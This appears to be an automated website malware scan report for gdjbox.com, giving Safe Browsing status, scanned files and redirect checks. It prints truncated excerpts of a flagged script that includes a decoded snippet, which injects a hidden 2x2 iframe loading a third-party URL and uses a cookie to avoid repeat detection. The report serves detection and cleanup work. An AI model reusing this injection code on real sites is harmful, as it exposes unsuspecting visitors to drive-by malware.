Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gdjbox.com
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gdjbox.com/ | 200 OK Content-Length: 10517 Content-Type: text/html | clean |
http://www.gdjbox.com/static/js/analytics.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://www.gdjbox.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://www.gdjbox.com/js/banner_fad.js | 200 OK Content-Length: 7947 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Both excerpts below are shown as the scanner printed them and are cut off mid-token in places.
Flagged file excerpt: function init() { if (arguments.callee.done) return; arguments.callee.done = true; so_init(); }; if (document.addEventListener) { document.addEventListener("so_init", init, false); } window.onload = init; var d=document, imgs = new Array(), zInterval = null, current=0, pause=false; function so_init() { if(!d.getElementById || !d.createElement)return; css = d.createElement('link'); css.setAttribute('href','http://www.lapita.net/js/css/style.
Decoded script: function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : ""); } fu if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr; } var user = getCookie("secheck"); if (user !=777){ document.write('<iframe src="http://searchnew.net/in.cgi?9" width=2 height=2 style="display:none" marginheight=0 marginwidth=0 scrolling=no></iframe>' ); setCookie("secheck", "777", 7, "/"); }
What the decoded script does: it reads the "secheck" cookie and, unless the value is 777, writes a hidden 2x2 iframe that loads a third-party URL into the page, then sets "secheck" to 777 for 7 days on path "/". A browser that already holds the cookie therefore does not receive the iframe again until the cookie expires, so re-checking the page after cleanup needs a cookie-free session.
Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gdjbox.com
Result:
GET / HTTP/1.1
Host: gdjbox.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gdjbox.com
Referer: http://www.google.com/search?q=gdjbox.com
Result:
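The result is similar to the first query. No suspicious redirects were found. Note that the hidden iframe reported under "Scanned pages/files" is written into the page by script in the browser, so it would not be expected to appear as an HTTP-level redirect in this check.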
GET / HTTP/1.1
Host: gdjbox.com
Referer: http://www.google.com/search?q=gdjbox.com
Result:
The result is similar to the first query. There are no suspicious redirects found.